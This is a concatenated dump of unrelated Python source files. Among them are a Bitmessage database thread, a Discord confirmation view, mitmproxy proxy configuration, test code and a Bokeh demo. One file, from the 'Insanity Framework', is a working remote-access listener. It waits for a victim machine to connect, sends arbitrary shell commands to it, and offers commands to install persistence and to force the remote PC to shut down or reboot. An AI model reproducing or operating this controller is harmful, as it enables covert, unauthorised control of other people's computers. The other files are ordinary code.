helper_sql.sql_ready.set() while True: item = helper_sql.sqlSubmitQueue.get() if item == 'commit': try: self.conn.commit() except Exception as err: if str(err) == 'database or disk is full': logger.fatal( '(While committing) Alert: Your disk or data storage volume is full.' ' sqlThread will now exit.') queues.UISignalQueue.put(( 'alert', ( _translate( "MainWindow", "Disk full"), _translate( "MainWindow", 'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'), True))) os._exit(0) elif item == 'exit': self.conn.close() logger.info('sqlThread exiting gracefully.') return elif item == 'movemessagstoprog': logger.debug('the sqlThread is moving the messages.dat file to the local program directory.') try: self.conn.commit() except Exception as err: if str(err) == 'database or disk is full': logger.fatal( '(while movemessagstoprog) Alert: Your disk or data storage volume is full.' ' sqlThread will now exit.') queues.UISignalQueue.put(( 'alert', ( _translate( "MainWindow", "Disk full"), _translate( "MainWindow", 'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'), True))) os._exit(0) self.conn.close() shutil.move( paths.lookupAppdataFolder() + 'messages.dat', paths.lookupExeFolder() + 'messages.dat') self.conn = sqlite3.connect(paths.lookupExeFolder() + 'messages.dat') self.conn.text_factory = str self.cur = self.conn.cursor() elif item == 'movemessagstoappdata': logger.debug('the sqlThread is moving the messages.dat file to the Appdata folder.') try: self.conn.commit() except Exception as err: if str(err) == 'database or disk is full': logger.fatal( '(while movemessagstoappdata) Alert: Your disk or data storage volume is full.' ' sqlThread will now exit.') queues.UISignalQueue.put(( 'alert', ( _translate( "MainWindow", "Disk full"), _translate( "MainWindow", 'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'), True))) os._exit(0) self.conn.close() shutil.move( paths.lookupExeFolder() + 'messages.dat', paths.lookupAppdataFolder() + 'messages.dat') self.conn = sqlite3.connect(paths.lookupAppdataFolder() + 'messages.dat') self.conn.text_factory = str self.cur = self.conn.cursor() elif item == 'deleteandvacuume': self.cur.execute('''delete from inbox where folder='trash' ''') self.cur.execute('''delete from sent where folder='trash' ''') self.conn.commit() try: self.cur.execute(''' VACUUM ''') except Exception as err: if str(err) == 'database or disk is full': logger.fatal( '(while deleteandvacuume) Alert: Your disk or data storage volume is full.' ' sqlThread will now exit.') queues.UISignalQueue.put(( 'alert', ( _translate( "MainWindow", "Disk full"), _translate( "MainWindow", 'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'), True))) os._exit(0) else: parameters = helper_sql.sqlSubmitQueue.get() rowcount = 0 try: self.cur.execute(item, parameters) rowcount = self.cur.rowcount except Exception as err: if str(err) == 'database or disk is full': logger.fatal( '(while cur.execute) Alert: Your disk or data storage volume is full.' ' sqlThread will now exit.') queues.UISignalQueue.put(( 'alert', ( _translate( "MainWindow", "Disk full"), _translate( "MainWindow", 'Alert: Your disk or data storage volume is full. Bitmessage will now exit.'), True))) os._exit(0) else: logger.fatal( 'Major error occurred when trying to execute a SQL statement within the sqlThread.' ' Please tell Atheros about this error message or post it in the forum!' ' Error occurred while trying to execute statement: "%s" Here are the parameters;' ' you might want to censor this data with asterisks (***)' ' as it can contain private information: %s.' ' Here is the actual error message thrown by the sqlThread: %s', str(item), str(repr(parameters)), str(err)) logger.fatal('This program shall now abruptly exit!') os._exit(0) helper_sql.sqlReturnQueue.put((self.cur.fetchall(), rowcount)) # helper_sql.sqlSubmitQueue.task_done() def create_function(self): # create_function try: self.conn.create_function("enaddr", 3, func=encodeAddress, deterministic=True) except (TypeError, sqlite3.NotSupportedError) as err: logger.debug( "Got error while pass deterministic in sqlite create function {}, Passing 3 params".format(err)) self.conn.create_function("enaddr", 3, encodeAddress)
py
7df9e2953076f7126207c9d2310cd002836598be
from typing import Any, Optional from discord import ui from discord.ext import commands import discord class ConfirmView(ui.View): def __init__( self, context: commands.Context, /, *, responded=None, delete_after=True, **kwargs: Any, ): super().__init__(**kwargs) self.ctx = context self._result = None self.message = None self.delete_after = delete_after self.responded = responded or context.author async def prompt(self, *args: str, **kwargs: Any) -> Optional[bool]: self.message = await self.ctx.send(*args, view=self, **kwargs) await self.wait() return self.result async def interaction_check(self, interaction: discord.Interaction) -> bool: if self.responded.id != getattr(interaction.user, "id", None): await interaction.response.send_message( f"Only {self.responded} can respond to this message!", ephemeral=True ) return False return True async def stopping(self): if self.delete_after: await self.message.delete(delay=0) else: for item in self.children: item.disabled = True await self.message.edit(view=self) def stop(self): super().stop() self.ctx.bot.loop.create_task(self.stopping()) @property def result(self): return self._result @result.setter def result(self, value): self._result = value self.stop() @ui.button(label="Accept", style=discord.ButtonStyle.green) async def accept(self, button: ui.Button, interaction: discord.Interaction): self.result = True @ui.button(label="Deny", style=discord.ButtonStyle.red) async def deny(self, button: ui.Button, interaction: discord.Interaction): self.result = False
py
7df9e34b08fabde5274c3194bcac4f2182c34544
# coding: utf-8 # # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file # except in compliance with the License. A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for # the specific language governing permissions and limitations under the License. # from __future__ import absolute_import from .endpoint import Endpoint from .header import Header from .filter_match_action import FilterMatchAction from .events_received_request import EventsReceivedRequest from .expired_request import ExpiredRequest from .start_event_handler_directive import StartEventHandlerDirective from .stop_event_handler_directive import StopEventHandlerDirective from .send_directive_directive import SendDirectiveDirective from .expiration import Expiration from .event import Event from .event_filter import EventFilter
py
7df9e4a35a9912a0ff849a79ca22a78e6ce2804e
from pyramid.response import Response import os HERE = os.path.dirname(__file__) def my_view(request): imported_text = open(os.path.join(HERE, 'sample.html')).read() return Response(imported_text) def includeme(config): config.add_view(my_view, route_name='home')
py
7df9e4b95c74dd8392d835fae7fb1afc503a4e06
from PyHive.Attribute import *
py
7df9e4d37df8be078c5b92f21b14d4738d5f8702
import json import jsonschema from jsonschema import validate as jvalidate from jsonschema import Draft4Validator from collections import OrderedDict from os.path import isdir, isfile, join def get_file_as_dict(fname): """Open the file and load as a dict""" fpath = join('input', fname) assert isfile(fpath), print('file not found: %s' % fpath) print('load file: %s' % fpath) info_dict = json.loads(open(fpath, 'r').read())# object_pairs_hook=OrderedDict) #if 'xvariables' in info_dict: # return info_dict['variables'] return info_dict def run_it(schema_fname, data_fname): # (1) VALIDATE THE SCHEMA # the_schema = get_file_as_dict(schema_fname) #print(json.dumps(the_schema, indent=4)) try: Draft4Validator(the_schema) except jsonschema.exceptions.ValidationError as err_obj: print('Schema Error. short message: ', err_obj.message) print('Schema Error. full message: ', err_obj) return # (2) VALIDATE THE DATA USING THE SCHEMA # the_data = get_file_as_dict(data_fname) #print(json.dumps(the_data, indent=4)) try: Draft4Validator(the_schema).validate(the_data) except jsonschema.exceptions.ValidationError as err_obj: print('Data Error. short message: ', err_obj.message) print('Data Error. full message: ', err_obj) return print('looking good!') if __name__ == '__main__': #run_it('dataset_schema.json', 'dataset_data_02.json') #run_it('variable_schema.json', 'variable_data_01.json') #run_it('variable_schema_05.json', 'variable_data_04.json') run_it('variable_schema_11.json', 'test_data.json')
py
7df9e4df6f967f13136a64320179eef6e6a0fc02
#!/usr/bin/python from collections import defaultdict import os, sys, re, subprocess, tempfile, json, pickle, random, time if __name__ == '__main__': types_filename = sys.argv[1] with open(types_filename, 'r') as f: types = [t.strip() for t in f.read().splitlines()] cnt = 0 for i, val in enumerate(types): index = 0 for j, char in enumerate(val): if (char == '<') and (val[j+1] == '-'): index = val[j-2] cmd = 'Feature{}(?heap{}),'.format(cnt,index) cnt = cnt+1 print cmd+val
py
7df9e5f004fe026ef72b8c9e30d1643d30f652ef
#!/usr/bin/python # -*- coding: iso-8859-15 -*- # Copyright 2017 Insanity Framework (IF) # Written by: * Alisson Moretto - 4w4k3 # https://github.com/4w4k3/Insanity-Framework # Licensed under the BSD-3-Clause from socket import * import os import sys from bin.settings import exec_com from bin.settings import BLUE, RED, WHITE, GREEN, END if not os.geteuid() == 0: sys.exit('Insanity must be run as root') HOST = '' PORT = int(raw_input('Tʏᴘᴇ ᴛʜᴇ ᴘᴏʀᴛ: ')) def clear(): os.system('clear') def heading(): sys.stdout.write(RED + ''' .o oOOOOOOOo OOOo Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO OOOOO '"OOOOOOOOOOOOOOOO"` oOO oOOOOOba. .adOOOOOOOOOOba .adOOOOo. oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': `$" `OOOO' `O"Y ' `OOOO' o . . . OP" : o . : ʙʏ: ''' + WHITE + '''Alisson Moretto(''' + RED + '''4ᴡ4ᴋ3''' + WHITE + ''')''' + RED + ''' -- [I]nsanity [F]ramework -- Version: 0.1 ''' + END) def pp(): sys.stdout.write(RED + ''' $u #$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$~ $# `"$$$$$$$$$$$$$$$$$$$$$$$$$$| [PROPANE |$$$$$$$ $i $$$$$$$$$$$$$$$$$$$$$$$$$$| [NIGHTMARE |$$$$$$$$ $$ #$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ #$. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$# $$ $iW$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$! $$i $$$$$$$#"" `"""#$$$$$$$$$$$$$$$$$#""""""#$$$$$$$$$$$$$$$W #$$W `$$$#" " !$$$$$` `"#$$$$$$$$$$# $$$ `` ! !iuW$$$$$ #$$$$$$$# #$$ $u $ $$$$$$$ $$$$$$$~ "# #$$i. # $$$$$$$. `$$$$$$ $$$$$i. """#$$$$i. .$$$$# $$$$$$$$! . ` $$$$$$$$$i $$$$$ `$$$$$ $iWW .uW` #$$$$$$$$$W. .$$$$$$# "#$$$$$$$$$$$$#` $$$$$$$$$$$iWiuuuW$$$$$$$$W !#"" "" `$$$$$$$##$$$$$$$$$$$$$$$$ i$$$$ . !$$$$$$ .$$$$$$$$$$$$$$$# $$$$$$$$$$` $$$$$$$$$Wi$$$$$$#"#$$` #$$$$$$$$$W. $$$$$$$$$$$# `` `$$$$##$$$$! i$u. $. .i$$$$$$$$$#""''' + WHITE + ''' InSaNiTy FrAmEwOrK''' + RED + ''' " `#W $$$$$$$$$$$$$$$$$$$` u$# W$$$$$$$$$$$$$$$$$$ $$$$W $$`!$$$##$$$$``$$$$ $$$$! i$" $$$$ $$#"` """ W$$$$ ''' + END) clear() heading() def mess(): print '[*] O.S.: ' + data2 if vm == 'True': print '[*] Virtual Machine: {0}Detected{1}'.format(RED, END) else: print '[*] Virtual Machine: Not Detected' print '-{0} Type a remote shell command{1} - {0}[{1}ex: ipconfig{0}]{1}: '.format(BLUE, END) print '- {0}Run insanity modules{1} - {0}[{1}view available modules on help message{0}]{1}: '.format(BLUE, END) print '-{0} ʜᴇʟᴘ {1}- {0}[{1}View help message and modules{0}]{1}: '.format(BLUE, END) s = socket(AF_INET, SOCK_STREAM) print '[!] Waiting Connections ' s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) s.bind((HOST, PORT)) print "[*] Listening on: 0.0.0.0:%s" % str(PORT) s.listen(10) conn, addr = s.accept() print '[*] Connection: ' + '{0}ESTABLISHED{2}'.format(GREEN, WHITE, END) data = conn.recv(1024) ip = conn.recv(1024) conn.send('whoami') data2 = conn.recv(1024) vm = conn.recv(1024) #oss = conn.recv(1024) mess() def help(): print ''' - [I]nsanity [F]ramework - ᴛʏᴘᴇ {0}info{1} - {0}[{1}show info about victim{0}]{1} ᴛʏᴘᴇ {0}persistence{1} - {0}[{1}enable persistence{0}]{1} ᴛʏᴘᴇ {0}shutdown{1} - {0}[{1}turn off remote pc{0}]{1} ᴛʏᴘᴇ {0}restart{1} - {0}[{1}reboot remote pc{0}]{1} ᴛʏᴘᴇ {0}back{1} - {0}[{1}return to main menu{0}]{1} ᴛʏᴘᴇ {0}quit{1} - {0}[{1}tool exit{0}]{1} '''.format(BLUE, END) # start loop def main(): try: while 1: # enter shell command header = ('{0}InSaNiTy{1} > {2}'.format(RED, WHITE, END)) command = raw_input(header) if command.upper() == 'QUIT': clear() pp() conn.close() elif command.upper() == 'HELP': help() elif command.upper() == 'INFO': mess() elif command.upper() == 'BACK': exec_com('insanity.py') elif command.upper() == 'PERSISTENCE': try: conn.send('persistence') print '[*] Persistence module enabled' except: print '\n' print '{0}Remote host are disconnected{1} '.format(RED, END) print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END) print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END) elif command.upper() == 'SHUTDOWN': try: conn.send('shutdown -s -t 00 -f') except: print '\n' print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END) print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END) print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END) elif command.upper() == 'RESTART': try: conn.send('shutdown -r -t 00 -f') except: print '\n' print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END) print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END) print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END) else: try: if command != '': data = '' conn.send(command) try: s.settimeout(5.0) conn.settimeout(5.0) data = conn.recv(4096) print data s.settimeout(None) conn.settimeout(None) except: print '[*] ᴄᴏᴍᴍᴀɴᴅ ᴇxᴇᴄᴜᴛᴇᴅ' except: print '\n' print '{0}ʀᴇᴍᴏᴛᴇ ʜᴏsᴛ ʜᴀs ʙᴇᴇɴ ᴅɪsᴄᴏɴɴᴇᴄᴛᴇᴅ{1} '.format(RED, END) print '\n' + 'ᴛʏᴘᴇ {0}ʙᴀᴄᴋ{1} - {0}[{1}ʀᴇᴛᴜʀɴ ᴛᴏ ᴍᴀɪɴ ᴍᴇɴᴜ{0}]{1}'.format(BLUE, END) print 'ᴛʏᴘᴇ {0}ǫᴜɪᴛ{1} - {0}[{1}ᴛᴏᴏʟ ᴇxɪᴛ{0}]{1}'.format(BLUE, END) except KeyboardInterrupt: clear() pp() conn.close() if __name__ == '__main__': main()
py
7df9e64c3e018390aa2257078e19f59682d38954
import pytest from plenum.common.signer_did import DidSigner from plenum.common.signer_simple import SimpleSigner from sovrin_client.client.wallet.wallet import Wallet from sovrin_client.test.cli.helper import prompt_is, addNym, ensureConnectedToTestEnv from sovrin_common.roles import Roles from sovrin_node.test.did.conftest import wallet, abbrevVerkey TRUST_ANCHOR_SEED = b'TRUST0NO0ONE00000000000000000000' @pytest.fixture("module") def trust_anchor_did_signer(): return DidSigner(seed=TRUST_ANCHOR_SEED) @pytest.fixture("module") def trust_anchor_cid_signer(): return SimpleSigner(seed=TRUST_ANCHOR_SEED) @pytest.fixture("module") def trustAnchorWallet(trustAnchorSigner): w = Wallet(trustAnchorSigner.identifier) w.addIdentifier(signer=trustAnchorSigner) return w def testPoolNodesStarted(poolNodesStarted): pass @pytest.fixture(scope="module") def aliceCli(be, do, poolNodesStarted, aliceCLI, connectedToTest, wallet): be(aliceCLI) do('prompt Alice', expect=prompt_is('Alice')) addAndActivateCLIWallet(aliceCLI, wallet) do('connect test', within=3, expect=connectedToTest) return aliceCLI @pytest.fixture(scope="module") def trustAnchorCli(be, do, poolNodesStarted, earlCLI, connectedToTest, trustAnchorWallet): be(earlCLI) do('prompt Earl', expect=prompt_is('Earl')) addAndActivateCLIWallet(earlCLI, trustAnchorWallet) do('connect test', within=3, expect=connectedToTest) return earlCLI def getNym(be, do, userCli, idr, expectedMsgs): be(userCli) do('send GET_NYM dest={}'.format(idr), within=3, expect=expectedMsgs ) def getNymNotFoundExpectedMsgs(idr): return ["NYM {} not found".format(idr)] def testGetDIDWithoutAddingIt(be, do, philCli, trust_anchor_did_signer): ensureConnectedToTestEnv(be, do, philCli) getNym(be, do, philCli, trust_anchor_did_signer.identifier, getNymNotFoundExpectedMsgs(trust_anchor_did_signer.identifier)) def testGetCIDWithoutAddingIt(be, do, philCli, trust_anchor_cid_signer): ensureConnectedToTestEnv(be, do, philCli) getNym(be, do, philCli, trust_anchor_cid_signer.identifier, getNymNotFoundExpectedMsgs(trust_anchor_cid_signer.identifier)) def addAndActivateCLIWallet(cli, wallet): cli.wallets[wallet.name] = wallet cli.activeWallet = wallet @pytest.fixture(scope="module") def didAdded(be, do, philCli, trust_anchor_did_signer): ensureConnectedToTestEnv(be, do, philCli) addNym(be, do, philCli, trust_anchor_did_signer.identifier, role=Roles.TRUST_ANCHOR.name ) return philCli def testAddDID(didAdded): pass @pytest.fixture(scope="module") def cidAdded(be, do, philCli, trust_anchor_cid_signer): addNym(be, do, philCli, trust_anchor_cid_signer.identifier, role=Roles.TRUST_ANCHOR.name) return philCli def testAddCID(cidAdded): pass def getNoVerkeyEverAssignedMsgs(idr): return ["No verkey ever assigned to the identifier {}".format(idr)] def testGetDIDWithoutVerkey(be, do, philCli, didAdded, trust_anchor_did_signer): getNym(be, do, philCli, trust_anchor_did_signer.identifier, getNoVerkeyEverAssignedMsgs(trust_anchor_did_signer.identifier)) def getVerkeyIsSameAsIdentifierMsgs(idr): return ["Current verkey is same as identifier {}".format(idr)] def testGetCIDWithoutVerkey(be, do, philCli, cidAdded, trust_anchor_cid_signer): getNym(be, do, philCli, trust_anchor_cid_signer.identifier, getVerkeyIsSameAsIdentifierMsgs(trust_anchor_cid_signer.identifier)) @pytest.fixture(scope="module") def verkeyAddedToDID(be, do, philCli, didAdded, trust_anchor_did_signer): addNym(be, do, philCli, trust_anchor_did_signer.identifier, trust_anchor_did_signer.verkey) def testAddVerkeyToExistingDID(verkeyAddedToDID): pass @pytest.fixture(scope="module") def verkeyAddedToCID(be, do, philCli, cidAdded, trust_anchor_cid_signer): # newSigner = SimpleSigner(identifier=trust_anchor_cid_signer.identifier) # new_verkey = newSigner.verkey addNym(be, do, philCli, trust_anchor_cid_signer.identifier, verkey=trust_anchor_cid_signer.verkey) return trust_anchor_cid_signer def testAddVerkeyToExistingCID(verkeyAddedToCID): pass def getCurrentVerkeyIsgMsgs(idr, verkey): return ["Current verkey for NYM {} is {}".format(idr, verkey)] def testGetDIDWithVerKey(be, do, philCli, verkeyAddedToDID, trust_anchor_did_signer): getNym(be, do, philCli, trust_anchor_did_signer.identifier, getCurrentVerkeyIsgMsgs(trust_anchor_did_signer.identifier, trust_anchor_did_signer.verkey)) def testGetCIDWithVerKey(be, do, philCli, verkeyAddedToCID, trust_anchor_cid_signer): getNym(be, do, philCli, trust_anchor_cid_signer.identifier, getCurrentVerkeyIsgMsgs(trust_anchor_cid_signer.identifier, trust_anchor_cid_signer.verkey)) def getNoActiveVerkeyFoundMsgs(idr): return ["No active verkey found for the identifier {}".format(idr)] def addAttribToNym(be, do, userCli, idr, raw): be(userCli) do('send ATTRIB dest={} raw={}'.format(idr, raw), within=5, expect=["Attribute added for nym {}".format(idr)]) @pytest.mark.skip("INDY- This should not have worked") def testSendAttribForDID(be, do, verkeyAddedToDID, trust_anchor_did_signer, aliceCli): raw = '{"name": "Alice"}' addAttribToNym(be, do, aliceCli, trust_anchor_did_signer.identifier, raw) @pytest.mark.skip("INDY- This should not have worked") def testSendAttribForCID(be, do, verkeyAddedToCID, trust_anchor_cid_signer, trustAnchorCli): raw = '{"name": "Earl"}' addAttribToNym(be, do, trustAnchorCli, trust_anchor_cid_signer.identifier, raw) @pytest.fixture(scope="module") def verkeyRemovedFromExistingDID(be, do, verkeyAddedToDID, abbrevIdr, aliceCli): be(aliceCli) addNym(be, do, aliceCli, abbrevIdr, '') getNym(be, do, aliceCli, abbrevIdr, getNoActiveVerkeyFoundMsgs(abbrevIdr)) @pytest.mark.skip(reason="verkey removal is not supported") def testRemoveVerkeyFromDID(verkeyRemovedFromExistingDID): pass @pytest.fixture(scope="module") def verkeyRemovedFromExistingCID(be, do, verkeyAddedToCID, trustAnchorSigner, trustAnchorCli, trustAnchorWallet): be(trustAnchorCli) addNym(be, do, trustAnchorCli, trustAnchorSigner.identifier, '') getNym(be, do, trustAnchorCli, trustAnchorSigner.identifier, getNoActiveVerkeyFoundMsgs(trustAnchorSigner.identifier)) @pytest.mark.skip(reason="verkey removal is not supported") def testRemoveVerkeyFromCID(verkeyRemovedFromExistingCID): pass @pytest.mark.skip(reason="SOV-568. Obsolete assumption, if an identity has set " "its verkey to blank, no-one including " "itself can change it") def testNewverkeyAddedToDID(be, do, philCli, abbrevIdr, verkeyRemovedFromExistingDID): newSigner = DidSigner() addNym(be, do, philCli, abbrevIdr, newSigner.verkey) getNym(be, do, philCli, abbrevIdr, getCurrentVerkeyIsgMsgs(abbrevIdr, newSigner.verkey)) @pytest.mark.skip(reason="SOV-568. Obsolete assumption, if an identity has set " "its verkey to blank, no-one including " "itself can change it") def testNewverkeyAddedToCID(be, do, philCli, trustAnchorSigner, verkeyRemovedFromExistingCID): newSigner = DidSigner() addNym(be, do, philCli, trustAnchorSigner.identifier, newSigner.verkey) getNym(be, do, philCli, trustAnchorSigner.identifier, getCurrentVerkeyIsgMsgs(trustAnchorSigner.identifier, newSigner.verkey)) def testNewKeyChangesWalletsDefaultId(be, do, poolNodesStarted, susanCLI, connectedToTest): mywallet = Wallet('my wallet') keyseed = 'a' * 32 idr, _ = mywallet.addIdentifier(seed=keyseed.encode("utf-8")) be(susanCLI) do('connect test', within=3, expect=connectedToTest) do('new key with seed {}'.format(keyseed)) do('send NYM dest={}'.format(idr)) do('new key with seed 11111111111111111111111111111111') do('send NYM dest={}'.format(idr), within=3, expect=["Nym {} added".format(idr)])
py
7df9e692971c6f5f7a3ccd646b60692c6368759e
import base64 import collections import os import re from typing import Any from mitmproxy.utils import strutils from OpenSSL import SSL, crypto from mitmproxy import exceptions from mitmproxy import options as moptions from mitmproxy import certs from mitmproxy.net import tcp from mitmproxy.net.http import authentication from mitmproxy.net.http import url CONF_BASENAME = "mitmproxy" class HostMatcher: def __init__(self, patterns=tuple()): self.patterns = list(patterns) self.regexes = [re.compile(p, re.IGNORECASE) for p in self.patterns] def __call__(self, address): if not address: return False address = tcp.Address.wrap(address) host = "%s:%s" % (address.host, address.port) if any(rex.search(host) for rex in self.regexes): return True else: return False def __bool__(self): return bool(self.patterns) ServerSpec = collections.namedtuple("ServerSpec", "scheme address") def parse_server_spec(spec): try: p = url.parse(spec) if p[0] not in (b"http", b"https"): raise ValueError() except ValueError: raise exceptions.OptionsError( "Invalid server specification: %s" % spec ) host, port = p[1:3] address = tcp.Address((host.decode("ascii"), port)) scheme = p[0].decode("ascii").lower() return ServerSpec(scheme, address) def parse_upstream_auth(auth): pattern = re.compile(".+:") if pattern.search(auth) is None: raise exceptions.OptionsError( "Invalid upstream auth specification: %s" % auth ) return b"Basic" + b" " + base64.b64encode(strutils.always_bytes(auth)) class ProxyConfig: def __init__(self, options: moptions.Options): self.options = options self.authenticator = None self.check_ignore = None self.check_tcp = None self.certstore = None self.clientcerts = None self.openssl_verification_mode_server = None self.configure(options, set(options.keys())) options.changed.connect(self.configure) def configure(self, options: moptions.Options, updated: Any) -> None: if options.add_upstream_certs_to_client_chain and not options.ssl_insecure: raise exceptions.OptionsError( "The verify-upstream-cert requires certificate verification to be disabled. " "If upstream certificates are verified then extra upstream certificates are " "not available for inclusion to the client chain." ) if options.ssl_insecure: self.openssl_verification_mode_server = SSL.VERIFY_NONE else: self.openssl_verification_mode_server = SSL.VERIFY_PEER self.check_ignore = HostMatcher(options.ignore_hosts) self.check_tcp = HostMatcher(options.tcp_hosts) self.openssl_method_client, self.openssl_options_client = \ tcp.sslversion_choices[options.ssl_version_client] self.openssl_method_server, self.openssl_options_server = \ tcp.sslversion_choices[options.ssl_version_server] certstore_path = os.path.expanduser(options.cadir) if not os.path.exists(os.path.dirname(certstore_path)): raise exceptions.OptionsError( "Certificate Authority parent directory does not exist: %s" % os.path.dirname(options.cadir) ) self.certstore = certs.CertStore.from_store( certstore_path, CONF_BASENAME ) if options.clientcerts: clientcerts = os.path.expanduser(options.clientcerts) if not os.path.exists(clientcerts): raise exceptions.OptionsError( "Client certificate path does not exist: %s" % options.clientcerts ) self.clientcerts = clientcerts for spec, cert in options.certs: cert = os.path.expanduser(cert) if not os.path.exists(cert): raise exceptions.OptionsError( "Certificate file does not exist: %s" % cert ) try: self.certstore.add_cert_file(spec, cert) except crypto.Error: raise exceptions.OptionsError( "Invalid certificate format: %s" % cert ) self.upstream_server = None self.upstream_auth = None if options.upstream_server: self.upstream_server = parse_server_spec(options.upstream_server) if options.upstream_auth: self.upstream_auth = parse_upstream_auth(options.upstream_auth) self.authenticator = authentication.NullProxyAuth(None) needsauth = any( [ options.auth_nonanonymous, options.auth_singleuser, options.auth_htpasswd ] ) if needsauth: if options.mode == "transparent": raise exceptions.OptionsError( "Proxy Authentication not supported in transparent mode." ) elif options.mode == "socks5": raise exceptions.OptionsError( "Proxy Authentication not supported in SOCKS mode. " "https://github.com/mitmproxy/mitmproxy/issues/738" ) elif options.auth_singleuser: parts = options.auth_singleuser.split(':') if len(parts) != 2: raise exceptions.OptionsError( "Invalid single-user specification. " "Please use the format username:password" ) password_manager = authentication.PassManSingleUser(*parts) elif options.auth_nonanonymous: password_manager = authentication.PassManNonAnon() elif options.auth_htpasswd: try: password_manager = authentication.PassManHtpasswd( options.auth_htpasswd ) except ValueError as v: raise exceptions.OptionsError(str(v)) if options.mode == "reverse": self.authenticator = authentication.BasicWebsiteAuth( password_manager, self.upstream_server.address ) else: self.authenticator = authentication.BasicProxyAuth( password_manager, "mitmproxy" )
py
7df9e7a64233624f61e8eb278b9e30efa25c112b
str1 = input() str2 = input() goal = input() d = {} l = list(str1) l2 = list(str2) for i in range (0, len(l2),1): if(l2[i] not in d): d.update({l2[i]:l[i]}) for x in range (0, len(goal),1): if(goal[x] in d): print(d.get(goal[x]),end = "") else: print(".", end = "")
py
7df9e88c3519949065edda03cbbd68120a7de923
import numpy as np from bokeh.layouts import row, widgetbox from bokeh.models import CustomJS, Slider from bokeh.plotting import figure, output_file, show, ColumnDataSource x = np.linspace(0, 10, 500) y = np.sin(x) source = ColumnDataSource(data=dict(x=x, y=y)) plot = figure(y_range=(-10, 10), plot_width=400, plot_height=400) plot.line('x', 'y', source=source, line_width=3, line_alpha=0.6) callback = CustomJS(args=dict(source=source), code=""" var data = source.data; var A = amp.value; var k = freq.value; var phi = phase.value; var B = offset.value; x = data['x'] y = data['y'] for (i = 0; i < x.length; i++) { y[i] = B + A*Math.sin(k*x[i]+phi); } source.change.emit(); """) amp_slider = Slider(start=0.1, end=10, value=1, step=.1, title="Amplitude", callback=callback) callback.args["amp"] = amp_slider freq_slider = Slider(start=0.1, end=10, value=1, step=.1, title="Frequency", callback=callback) callback.args["freq"] = freq_slider phase_slider = Slider(start=0, end=6.4, value=0, step=.1, title="Phase", callback=callback) callback.args["phase"] = phase_slider offset_slider = Slider(start=-5, end=5, value=0, step=.1, title="Offset", callback=callback) callback.args["offset"] = offset_slider layout = row( plot, widgetbox(amp_slider, freq_slider, phase_slider, offset_slider), ) output_file("slider.html", title="slider.py example") show(layout)
py
7df9eb0e53e42636234e9280891099792786c1fc
